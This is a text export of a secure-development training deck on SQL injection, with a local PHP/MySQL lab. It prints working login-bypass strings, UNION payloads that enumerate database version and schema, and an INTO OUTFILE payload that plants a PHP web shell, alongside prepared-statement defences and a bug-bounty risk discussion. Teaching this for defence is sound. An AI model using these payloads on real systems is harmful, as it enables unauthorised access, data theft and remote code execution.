Secure Development


Abhinav Sejpal


 
 


Disclaimer


  • This presentation is intended for educational purpose only and I cannot be held liable for any kind of damages done, whatsoever to your machine, or any other damages. 
  • Don't try this attack on any other system without having contextual knowledge or permission, this may harm someone directly or indirectly.
  • Feel free to use this presentation for practice or educational purpose.
 

 
 

~ we aren't going to do this ~

No Automated Scan Using Any Tool

Please feel free to stop when you have a doubt! 

 
 



Agenda


  •  Learn 
  •  Hack   
  •  Q  &  A


 
 
 
 
 

- Common Dev Team Myths  - 


  • Buy this SAST/DAST/VAPT tool and, it will solve all security problems
  • We don’t have anything worth to be stolen, or We aren't interesting targets for hacker community 
  • {Java/Python... - Insert Name here} is a secured language
  • We never had any data breaches in our organization and, we are safe.  We bunch of smart guys. #facepalm 
  • We have a firewall setup (WAF) - Nothing to worry! 
  • You're safer on a mobile site as compared to a desktop.
  • HTTPS Websites are secured, Nobody can hack 
  • Can come up with umpteen more!


 
 
How Does Web work?

 
 
 




 
 

 User Input? aha

Modern websites rely on user input for everything.
They are basically applications which expect various kinds of inputs coming from users to function a certain way. 

 

What if this works? Umm


 


SQLi is old days' problem, I shouldn't worry about this.

^^

I am using the modern days' framework.

CAKE PHP
Struts 
Hibernet
Spring Boot
GWT (Google Web Toolkit)
ESAPI (OWASP)


--- True in some cases  but not always --- 

1

I AM that bad input 

'Injection ' 

Could be Command / SQL or any programmed statement 
OWASP #A1


 
 

What is SQL ?


SQL stands for Structured Query Language.


  • Execute queries against a database
  • Retrieve data from a database
  • Insert new records in a database
  • Delete records from a database
  • In short, All DB operations :)


Setup the Test Lab


Install LAMP

Linux, Apache, Mysql, PHP

Vagrant Provision file is available @ Gitlab 
 


Targeted Application


Client Side language : HTML & Javascript
Server side Language: PHP
DB : MYSQL 


1



PHP: 244M sites Approx.

2.1M IP addresses


 



 


SQLi Demo

Don't Keep first user as default user as Root or Admin



1

Cheat sheet


#Attack  - 1


SELECT * FROM `users` WHERE `username` ='admin' or '1'='1' and password ='I dont know'


Injection code :-

admin' or '1'='1


 

Learning from the attack 1


Username is known i.e. 'admin'

  •  Append SQL statement with user name
  •  
  • <It simply works>

    But you can't perform this attack without username


    4

    Why ?

    Attack 1 relies on 'User name'


    SELECT * FROM `users` WHERE `username` ='admin' or '1'='1' and password ='I dont know due to hash or Salt'


    Can't perform this attack on password field due to encryption.

    User name = anything' or '1' ='1

    password = anything' or '1'='1


    * known User name is mandatory Here*

    1

    Concept

    Basic SQL query Login page :-

    SELECT * FROM users where username="username" AND password = "pass"


    Basic PHP statement for Login page :-

    SELECT * FROM users where username='".$username."' AND password = '".md5($pass)."'"  


    *Md5() method is used to encrypt the password.

           * Demo at SQL *

    Comments based SQLi

    http://dev.mysql.com/doc/refman/5.1/en/comments.html


    # : Single line comment

    "-- " : Sequence to end of line comment

    /*  Sequence to following block comment*/

    White List Input Validation

     

    (-- ) works for you buddy!

    * --(space) is syntax 


    admin' or '1' = '1' --:False 

    admin' or '1' = '1' --  : True


    Mostly people forget to add space, so I use below vector

    admin' or '1' = '1' -- space + any one character

    E.G. > admin' or '1' = '1' -- LOL

     

    if you follow me - attack doesn't require user name now


     SELECT * FROM users where username="admin" or '1' ='1' # AND password = "pass"


    SQL statement will be always true due  '1' = '1'  thus doesn't matter, you are knowing user name or not.


    Yes - I am done. but what if '#' is not valid input?

     

    Concept

    Basic SQL query Login page :-

    SELECT * FROM users where username="username" AND password = "pass"


    What if  - I insert comments in first attack

    SELECT * FROM users where username="admin" or '1' ='1' # AND password = "pass"


    << AND password = "pass" >> doesn't execute all

     
     

    MD5 Encryption

    Don't use Weak Hash 


    Secure Hash

    Making Password Cracking Harder: Slow Hash Functions


    Yes, Add Salt 

    The WRONG Way: Short Salt & Salt Reuse

    Use Random Stuff for secure Coding

    https://crackstation.net/hashing-security.htm 



     
     
     


    So, What do you think,

    SQL is all about  1=1

    Big NO :)

    Concepts 

    Select * from products where product_name like "a%"

    Select * from products where product_name like "b%" union select 1,2,3,4,5 from users 


     
     

    Dump Sensitive DB info

    Identify columns & verbose dataset


    UNION is used to combine the result from multiple SELECT statements into a single result set.


    a%' union select 1,2,3,4,5 from users #

    a%' union select 1,@@datadir,2,3,4 from users #

    a%' union select 1,@@version,3,4,5 from users #


    https://dev.mysql.com/doc/refman/5.7/en/using-system-variables.html


     

    Database Enumeration  


    a%' union select 1,table_schema,2,3,4 from information_schema.tables  #

     

    Table Enumeration

    a%' union select 1,table_schema,table_name,3,4 from information_schema.tables  #


    a%' union select 1,table_schema,table_name,3,4 from information_schema.tables  where table_schema='sqlhumla'#

    Defence #101

    Prepared statatements with parameterize queries  

    • Java EE – use PreparedStatement() with bind variables
    • NET – use parameterized queries like SqlCommand() or OleDbCommand() with bind variables
    • PHP – use PDO with strongly typed parameterized queries (using bindParam())
    • Hibernate - use createQuery() with bind variables (called named parameters in Hibernate
    • SQLite - use sqlite3_prepare() 

    Defence #101



     
     
     

    Shell Injection

     - Text File Writing

    Into outfile 


    I want to save a MySQL query result to a text file like this:

    SELECT * FROM orders INTO OUTFILE '/data.txt'select * FROM users where username="frodo" into outfile "test.txt"

    Can we append the same logic with our injection?

    select * from users where user=frodo' into outfile 'test.txt'; -- 

    1

    Shell Injection


    'Hello world' PHP File Writing at current folder

    =frodo' into outfile "../../htdocs/xampp/sqli/test.txt"; - a

    Select * from users where username = 'frodo' union select 1,2,3,"<?php  echo "Hello World"; ?> ",5 from users into outfile '../../htdocs/xampp/sqli/shellTest.php';  -- a


     

    PHP Shell code


    <?php $output = shell_exec('Test'); echo '<pre>$output</pre>'; ?>


    Append the same as SQL injection


    user=frodo' union select 1,2,3, "<?php $output = shell_exec('test'); echo '<pre>$output</pre>'; ?>", 5 from users into outfile '../../htdocs/xampp/sqli/shell.php';  -- a



    1

    There you are!

    http://127.0.0.1/xampp/Sqli/shell.php?test=dir

       




    when SQL Injection does not cause a business risk


    WHAT? That’s unpossible! 

    Injection is #1 on the OWASP Top Ten!

    Defense Scenario 



    Imagine you have a web app with an SQL database. It contains only one table, and all of the data in that table is available via the search field on the website. None of it is sensitive data. The database user that the app uses is read-only. But the application is vulnerable SQL Injection (SQLi).

    Where’s the business risk? 

    How does this affect the Confidentiality, Integrity or the Availability (CIA) of the app? Since none of the data in the entire database is confidential, so the “C” does not apply. And since the database user is read-only, that means the data cannot be changed (update, create or delete) with this attack, only read (select). The read-only means it also cannot allow any sort of code execution on the database server, other than the select statement. That covers the “I”. And “A”, availability? I suppose there is the potential to do extremely large queries in attempts to perform a denial of service attack... But there are many ways to attempt a DOS attack, and I wouldn’t qualify this as a critical business risk by any means.

    Bug Bounty View


    This is the type of thing that also gets rejected from a bug bounty program. Yes, you can perform SQLi on the app, but it isn’t a big scary problem. Yes, you can cause the application to misbehave, but it does not present a threat to the business.


    Timeline

     If I found this problem in one of my apps would I put it in the bug tracker to be fixed? Absolutely. Would I make my dev team stay up all night fixing it or take the server offline? Nope. In fact, this exact situation happened to me while I was managing an incident, and the person who reported it was furious with me, claiming I didn’t take security seriously, I didn’t know what I was doing, etc. But I stand by the decision, and everything was fine (despite him complaining to my boss about me). We did fix it, but not that night.

     
    1
    1
     
     

    Play ground


    Damn Vulnerable Web App

    Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment.

    http://www.dvwa.co.uk/

    https://github.com/RandomStorm/DVWA



    Yes - I'm Done!



     

    Secure Development

    By Abhinav Sejpal

    Secure Development

    DevSecOps (Developer track)

    • 1,708